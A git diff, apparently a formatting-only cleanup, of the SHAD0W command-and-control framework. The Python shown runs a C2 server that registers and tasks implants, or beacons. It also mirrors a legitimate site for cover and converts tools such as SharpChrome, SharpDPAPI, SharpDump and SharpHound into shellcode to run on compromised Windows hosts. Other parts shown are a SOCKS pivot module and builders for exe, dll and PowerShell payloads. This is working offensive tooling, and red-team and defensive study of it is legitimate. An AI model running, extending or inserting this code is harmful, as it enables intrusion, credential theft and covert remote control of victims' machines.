View File

@ -16,19 +16,23 @@ USERCD_EXEC_ID = 0x3000
# location of Sharpchrome binary
SHARPCHROME_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpChrome.exe"
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
def sharpchrome_callback(shad0w, data):
print(data)
return ""
def usage():
pass
def main(shad0w, args):
# check we actually have a beacon

7
lib/commands/sharpdpapi.py
View File

@ -16,19 +16,22 @@ USERCD_EXEC_ID = 0x3000
# location of sharpdpapi binary
SHARPDPAPI_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpDPAPI.exe"
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
def sharpdpapi_callback(shad0w, data):
print(data)
return ""
def usage():
pass
def main(shad0w, args):
# check we actually have a beacon

5
lib/commands/sharpdump.py
View File

@ -16,16 +16,19 @@ USERCD_EXEC_ID = 0x3000
# location of sharpdump binary
SHARPDUMP_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpDump.exe"
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
def sharpdump_callback(shad0w, data):
print(data)
return ""
def main(shad0w, args):
# check we actually have a beacon

4
lib/commands/sharphound.py
View File

@ -16,8 +16,9 @@ USERCD_EXEC_ID = 0x3000
# location of sharphound binary
SHARPHOUND_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpHound.exe"
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
@ -26,6 +27,7 @@ def sharphound_callback(shad0w, data):
return ""
def main(shad0w, args):
# check we actually have a beacon

16
lib/commands/sharpsocks.py
View File

@ -26,22 +26,25 @@ error_list = ""
# location of sharpsocks binary
sharpsocks_BIN = "/root/shad0w/bin/SharpSocks.x86.exe"
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def sharpsocks_callback(shad0w, data):
if shad0w.sharpsocks_verbose:
print(data)
return ""
def start_sharpsocks_server(http_listen=None, socks_listen=None, quick=True, cmd_line=None):
# modules directory
modules_dir = "/root/shad0w/modules/windows/sharpsocks/"
@ -64,8 +67,8 @@ def start_sharpsocks_server(http_listen=None, socks_listen=None, quick=True, cmd
try:
os.unlink("/tmp/sharpsocks.log")
except: pass
except:
pass
data = ""
for _ in range(0, 5):
@ -89,10 +92,12 @@ def start_sharpsocks_server(http_listen=None, socks_listen=None, quick=True, cmd
return key
def kill_server():
os.popen("killall -9 SharpSocksServe")
return
def await_for_socks_start(shad0w):
while True:
try:
@ -105,6 +110,7 @@ def await_for_socks_start(shad0w):
except FileNotFoundError: pass
return
def main(shad0w, args):
global EXEC_SHARPSOCKS
@ -148,7 +154,7 @@ sharpsocks client -s http://your.redirector:port/ -k key
pass
# make sure we have an argument
if (len(raw_args) == 1):
if len(raw_args) == 1:
parse.print_help()
return
@ -192,4 +198,4 @@ sharpsocks client -s http://your.redirector:port/ -k key
b64_comp_data = shellcode.generate(sharpsocks_BIN, args, args.param)
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID, b64_comp_data)
shad0w.beacons[shad0w.current_beacon]["callback"] = sharpsocks_callback
shad0w.beacons[shad0w.current_beacon]["callback"] = sharpsocks_callback

6
lib/commands/sharpup.py
View File

@ -16,16 +16,18 @@ USERCD_EXEC_ID = 0x3000
# location of SharpUp binary
SHARPUP_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpUp.exe"
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
def sharpup_callback(shad0w, data):
print(data)
return ""
def main(shad0w, args):
# check we actually have a beacon

6
lib/commands/sharpwmi.py
View File

@ -16,19 +16,23 @@ USERCD_EXEC_ID = 0x3000
# location of sharpwmi binary
SHARPWMI_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/SharpWMI.exe"
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
def sharpwmi_callback(shad0w, data):
print(data)
return ""
def usage():
pass
def main(shad0w, args):
# check we actually have a beacon

10
lib/commands/upload.py
View File

@ -21,16 +21,18 @@ error_list = ""
FILE_TO_UPLOAD = ""
FILE_DATA = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def upload_callback(shad0w, data):
global FILE_TO_UPLOAD, FILE_DATA
@ -66,8 +68,8 @@ upload -f fake_secret_plans.txt -d C:\\Users\\thejoker\\Desktop\\batmans_secret_
# init the parser
parse = argparse.ArgumentParser(prog='upload',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
@ -138,4 +140,4 @@ upload -f fake_secret_plans.txt -d C:\\Users\\thejoker\\Desktop\\batmans_secret_
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["callback"] = upload_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)

5
lib/commands/watson.py
View File

@ -16,16 +16,19 @@ USERCD_EXEC_ID = 0x3000
# location of Watson binary
WATSON_BIN = "/root/shad0w/bin/SharpCollection/NetFramework_4.5_x86/Watson.exe"
# little hack but lets us pass the args to Donut
class DummyClass(object):
# little hack but lets us pass the args to Donut
def __init__(self):
pass
def watson_callback(shad0w, data):
print(data)
return ""
def main(shad0w, args):
# check we actually have a beacon

8
lib/commands/whoami.py
View File

@ -21,16 +21,18 @@ TMP_EXEC_ID = 0x3000
ERROR = False
error_list = ""
# let argparse error and exit nice
def error(message):
global ERROR, error_list
ERROR = True
error_list += f"\033[0;31m{message}\033[0m\n"
def exit(status=0, message=None):
if message != None: print(message)
return
def whoami_callback(shad0w, data):
if len(data) > 1:
print("")
@ -38,6 +40,7 @@ def whoami_callback(shad0w, data):
return ""
def get_whoami_args(args):
data = ""
@ -52,6 +55,7 @@ def get_whoami_args(args):
return data
async def main(shad0w, args):
global ERROR
@ -124,4 +128,4 @@ whoami --groups
rcode = base64.b64encode(shellcode.generate(file, None, None, parse=False)).decode()
shad0w.beacons[shad0w.current_beacon]["callback"] = whoami_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (TMP_EXEC_ID, rcode)
shad0w.beacons[shad0w.current_beacon]["task"] = (TMP_EXEC_ID, rcode)

1
lib/compile.py
View File

@ -4,6 +4,7 @@ Compile the stuff
import os
class Binary(object):
def __init__(self):
super(Binary, self).__init__()

4
lib/console.py
View File

@ -16,6 +16,7 @@ from prompt_toolkit.patch_stdout import patch_stdout
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.shortcuts import prompt, CompleteStyle, PromptSession
class Console(object):
def __init__(self, shad0w):
@ -102,7 +103,8 @@ class Console(object):
print("ERROR:", e)
# if in debug mode drop the full traceback
if self.shad0w.debugv: traceback.print_exc()
if self.shad0w.debugv:
traceback.print_exc()
pass
except KeyboardInterrupt:

4
lib/debug.py
View File

@ -2,6 +2,7 @@ import sys
import time
import threading
class Debug(object):
def __init__(self, arg):
super(Debug, self).__init__()
@ -36,8 +37,7 @@ class Debug(object):
sys.stdout.write("\r")
def spinner(self, text):
spin_thread = threading.Thread(target=self.do_spinner, args=(text,))
spin_thread.daemon = False
spin_thread.start()
spin_thread.start()

2
lib/encryption.py
View File

@ -1,5 +1,6 @@
import random
class XOR(object):
def __init__(self):
super(XOR, self).__init__()
@ -8,6 +9,7 @@ class XOR(object):
def gen_key(self):
self.key = random.randint(10, 100)
def crypt_file(self, crypt, key, infile=None, data=None, data_length=None):
bytes = ""
if (infile != None) and (data == None):

18
lib/http_server.py
View File

@ -11,13 +11,14 @@ from flask import Flask, request, jsonify, Response
app = Flask(__name__)
# shut flask output up
log = logging.getLogger('werkzeug')
log.disabled = True
cli = sys.modules['flask.cli']
log = logging.getLogger('werkzeug')
log.disabled = True
cli = sys.modules['flask.cli']
cli.show_server_banner = lambda *x: None
IGNORE_CONTENT = ""
@app.before_request
def log_request():
# this will show every request that the flask server gets
@ -27,6 +28,7 @@ def log_request():
# do nothing just return
return None
@app.route("/")
def web_blank_page():
# this page should never be hit by a legit beacon, so if it is then its not a beacon.
@ -39,6 +41,7 @@ def web_blank_page():
elif shad0w.mirror is not None:
return shad0w.page_data
@app.route("/register", methods=["GET", "POST"])
def web_register_beacon():
# register the beacon
@ -48,18 +51,21 @@ def web_register_beacon():
# just give it the request so it can pull stuff out itself
return phandle.register_beacon(request)
@app.route("/tasks", methods=["GET", "POST"])
def web_task_beacon():
# register a task on a beacon
return phandle.task_beacon(request)
@app.route("/stage", methods=["GET", "POST"])
def web_stage_beacon():
# send the requested stage to a beacon
return phandle.stage_beacon(request)
@app.errorhandler(404)
def not_found(e):
@ -77,7 +83,8 @@ def not_found(e):
for obj in shad0w.beacons[shad0w.current_beacon]["serve"]:
if obj == request.path:
return shad0w.beacons[shad0w.current_beacon]["serve"][obj]
except: pass
except:
pass
if shad0w.mirror is None:
return ""
@ -90,10 +97,11 @@ def not_found(e):
return Response(data, status_code, headers)
def run_serv(*args):
# cant think of a better way doing this so guess i gotta use globals
global shad0w, phandle
shad0w = args[0]
shad0w = args[0]
phandle = Handler(shad0w)

8
lib/input_handler.py
View File

@ -5,6 +5,7 @@ from prompt_toolkit.patch_stdout import patch_stdout
from lib.commands import *
class Handler(object):
def __init__(self, shad0w):
@ -17,8 +18,8 @@ class Handler(object):
# split command into name + args
splitcommand = cmd.split(" ")
basecmd = splitcommand[0]
cmd_args = splitcommand[0:]
basecmd = splitcommand[0]
cmd_args = splitcommand[0:]
# see if we need to execute a local command
try:
@ -35,7 +36,8 @@ class Handler(object):
os.chdir(cwd)
return
except IndexError: pass
except IndexError:
pass
# find the handle for the module in the globals list an call it with args

6
lib/mirror.py
View File

@ -3,9 +3,11 @@
import re
import requests
def get_base_domain(site):
return site.replace("https://", "").replace("http://", "").replace("/", "")
def get_base_page(shad0w, site, dynamic=False, htmlonly=False, method=None, headers=None, data=None, cookies=None):
try:
if dynamic:
@ -31,6 +33,7 @@ def get_base_page(shad0w, site, dynamic=False, htmlonly=False, method=None, head
if htmlonly:
return req.text
def fix_internal_links(shad0w, html, site):
# add us to paths
if shad0w.endpoint is None:
@ -50,6 +53,7 @@ def fix_internal_links(shad0w, html, site):
return html
def mirror_site(shad0w, site, dynamic=False, method=None, headers=None, data=None, cookies=None):
if not dynamic:
@ -61,4 +65,4 @@ def mirror_site(shad0w, site, dynamic=False, method=None, headers=None, data=Non
if dynamic:
data, headers, status_code = get_base_page(shad0w, site, dynamic=dynamic, method=method, headers=headers, data=data, cookies=cookies)
data = fix_internal_links(shad0w, data, site)
return data, status_code, headers
return data, status_code, headers

16
lib/path_handler.py
View File

@ -8,7 +8,8 @@ from .responce_builder import Builder
DATA_CMD_OUT = 0x2000
DATA_CMD_PRO = 0x3000
DO_CALLBACK = 0x4000
DO_CALLBACK = 0x4000
class Handler(object):
@ -106,12 +107,12 @@ class Handler(object):
self.shad0w.beacons[beacon_id]["num"] = self.shad0w.beacon_count
# store basic info about beacon
self.shad0w.beacons[beacon_id]["domain"] = domain
self.shad0w.beacons[beacon_id]["machine"] = machine
self.shad0w.beacons[beacon_id]["username"] = username
self.shad0w.beacons[beacon_id]["arch"] = arch
self.shad0w.beacons[beacon_id]["os"] = opsystem
self.shad0w.beacons[beacon_id]["impersonate"] = None
self.shad0w.beacons[beacon_id]["domain"] = domain
self.shad0w.beacons[beacon_id]["machine"] = machine
self.shad0w.beacons[beacon_id]["username"] = username
self.shad0w.beacons[beacon_id]["arch"] = arch
self.shad0w.beacons[beacon_id]["os"] = opsystem
self.shad0w.beacons[beacon_id]["impersonate"] = None
# if we are impersonating a session then tell that beacon
if str(impersonate) != "None":
@ -202,7 +203,6 @@ class Handler(object):
self.shad0w.debug.log("invalid http method for stager")
return self.builder.build(blank=True)
def blank_page(self):
# does what the function says
return self.builder.build(blank=True)

6
lib/payload_format.py
View File

@ -10,11 +10,13 @@ from lib.templates import powershell
formats = ('raw', 'exe', 'psh', 'dll')
def get_size(filename):
# get the bytes of the exe
with open(filename, 'rb') as file:
return len(file.read())
def format_raw(builder, length=True, code=False):
# extract the shellcode from the new beacon
rcode = buildtools.extract_shellcode()
@ -28,6 +30,7 @@ def format_raw(builder, length=True, code=False):
if code:
return rcode
def format_exe(builder, length=True, code=False):
# get the bytes of the exe
# with open("/root/shad0w/beacon/beacon.exe", 'rb') as file:
@ -55,6 +58,7 @@ def format_exe(builder, length=True, code=False):
with open(builder.outfile, 'rb') as file:
return file.read()
def format_powershell(builder, length=True, code=False):
outfile = builder.outfile
@ -79,6 +83,7 @@ def format_powershell(builder, length=True, code=False):
if code:
return pcode
def format_dll(builder, length=True, code=False):
# get the the beacon shellcode
@ -96,6 +101,7 @@ def format_dll(builder, length=True, code=False):
with open(builder.outfile, 'rb') as file:
return file.read()
def create(builder):
if builder.format == "raw":
return format_raw(builder)

4
lib/responce_builder.py
View File

@ -1,5 +1,6 @@
import json
class Builder(object):
def __init__(self, shad0w):
@ -27,7 +28,8 @@ class Builder(object):
try:
if resp["task"] == None:
resp["task"] = 0x1000
except KeyError: pass
except KeyError:
pass
# now return the dict in json format

5
lib/shellcode.py
View File

@ -5,6 +5,7 @@ import tempfile
from lib.ShellcodeRDI import *
def generate_srdi(file, flags):
""" generate shellcode from a reflective dll using sRDI """
@ -15,12 +16,14 @@ def generate_srdi(file, flags):
return ConvertToShellcode(dll_data, hfunc, b"None", flags)
def parse_donut_error(data, filename):
if "Error : File not found." in data:
print(f"Unable to find '{filename}'.")
else:
print(f"Failed to execute '{filename}'.")
def generate(file, args, params, parse=True):
""" generate shellcode from a pe using Donut """
@ -110,4 +113,4 @@ def generate(file, args, params, parse=True):
# return the raw shellcode
with open(temp.name, "rb") as file:
return file.read()
return file.read()

35
lib/tools.py
View File

@ -9,8 +9,9 @@ from datetime import datetime
from lib import buildtools
# list all command scripts in the commands dir, append to list of commands
def get_commands():
# list all command scripts in the commands dir, append to list of commands
commandList = []
for _, _, f in os.walk("/root/shad0w/lib/commands/"):
for file in f:
@ -18,16 +19,18 @@ def get_commands():
commandList.append(file.replace(".py",""))
return commandList
def generate_beacon_id():
# get md5 hash of the current date + time
return hashlib.md5(str(datetime.now()).encode()).hexdigest()
def get_data_from_json(jdata):
# get the data from data
id = ""
id = ""
opcode = 0
data = ""
data = ""
# if we get any errors, just return the above values and this req will then be ignored
try:
@ -43,18 +46,19 @@ def get_data_from_json(jdata):
return id, opcode, data
async def compile_and_store_static(shad0w):
# compile a static secure beacon and store it in memory
shad0w.payloads["x64_secure_static"] = {}
arch = "x64"
arch = "x64"
platform = "windows"
secure = "secure"
static = "static"
secure = "secure"
static = "static"
# basically just make a random string
dir_name = generate_beacon_id()
lib_dir_name = "/tmp/" + dir_name + "/lib/"
dir_name = generate_beacon_id()
lib_dir_name = "/tmp/" + dir_name + "/lib/"
build_dir_name = "/tmp/" + dir_name + "/build/"
Path(lib_dir_name).mkdir(parents=True, exist_ok=True)
@ -89,6 +93,7 @@ async def compile_and_store_static(shad0w):
return
async def compile_and_store_static_srdi(shad0w):
# compile a static secure beacon and store it in memory
shad0w.payloads["x64_secure_static_srdi"] = {}
@ -99,14 +104,14 @@ async def compile_and_store_static_srdi(shad0w):
static = "static"
# basically just make a random string
dir_name = generate_beacon_id()
lib_dir_name = "/tmp/" + dir_name + "/lib/"
dir_name = generate_beacon_id()
lib_dir_name = "/tmp/" + dir_name + "/lib/"
build_dir_name = "/tmp/" + dir_name + "/build/"
Path(lib_dir_name).mkdir(parents=True, exist_ok=True)
Path(build_dir_name).mkdir(parents=True, exist_ok=True)
mod_name = f"{build_dir_name}../beacon.dll"
mod_name = f"{build_dir_name}../beacon.dll"
os.system(f"cp -r /root/shad0w/beacon/lib/* {lib_dir_name}")
@ -136,13 +141,15 @@ async def compile_and_store_static_srdi(shad0w):
shad0w.compile_finished = True
return
def loading_banner(shad0w):
while shad0w.compile_finished != True:
loading = list("Starting SHAD0W C2...")
iter = 1
colour = random.choice([1,2,3,4,5,6])
colour = random.choice([1, 2, 3, 4, 5, 6])
for i in loading:
if shad0w.compile_finished == True: break
if shad0w.compile_finished == True:
break
time.sleep(0.15)
i = f"\033[1;3{colour}m" + i + "\033[0m"
@ -154,4 +161,4 @@ def loading_banner(shad0w):
sys.stdout.write("\r" + " "*100 + "\r")
sys.stdout.flush()
shad0w.screen_finish = True
shad0w.screen_finish = True

35
shad0w.py
View File

@ -19,6 +19,7 @@ from lib import mirror
from lib import payload_format
from lib import tools
class Shad0wC2(object):
def __init__(self, args):
@ -26,42 +27,42 @@ class Shad0wC2(object):
super(Shad0wC2, self).__init__()
# payload store
self.payloads = {}
self.payloads = {}
# declare all the vitial variables to run.
self.addr = (args['address'], args['port'])
self.debugv = args['debug']
self.sslkey = args['key']
self.sslcrt = args['cert']
self.addr = (args['address'], args['port'])
self.debugv = args['debug']
self.sslkey = args['key']
self.sslcrt = args['cert']
# framework variables
self.variables = {}
self.variables = {}
# set the msf callback size
self.variables["MsfUriSize"] = 1337
# website we can mirror
self.mirror = args['mirror']
self.mirror = args['mirror']
# endpoint for modules to callback to
self.endpoint = args['endpoint']
self.endpoint = args['endpoint']
# runtime variables
self.beacons = {}
self.beacon_count = 0
self.current_beacon = None
self.beacons = {}
self.beacon_count = 0
self.current_beacon = None
# loading screen stuff
self.screen_finish = False
self.screen_finish = False
# get the debug/logging stuff ready
self.debug = debug.Debug(self.debugv)
self.debug = debug.Debug(self.debugv)
# console class
self.console = console.Console(self)
self.console = console.Console(self)
# super useful
self.crypt = encryption
self.crypt = encryption
def start(self):
@ -156,8 +157,6 @@ class Shad0wBuilder(object):
print("\033[1;32m[+]\033[0m", f"Created {self.outfile} ({length} bytes)")
if __name__ == '__main__':
# sort the first cmd switch to decide weather we beacon or listen
@ -201,4 +200,4 @@ if __name__ == '__main__':
if args["mode"] == "beacon":
# build the beacon
shad0w = Shad0wBuilder(args)
shad0w.build()
shad0w.build()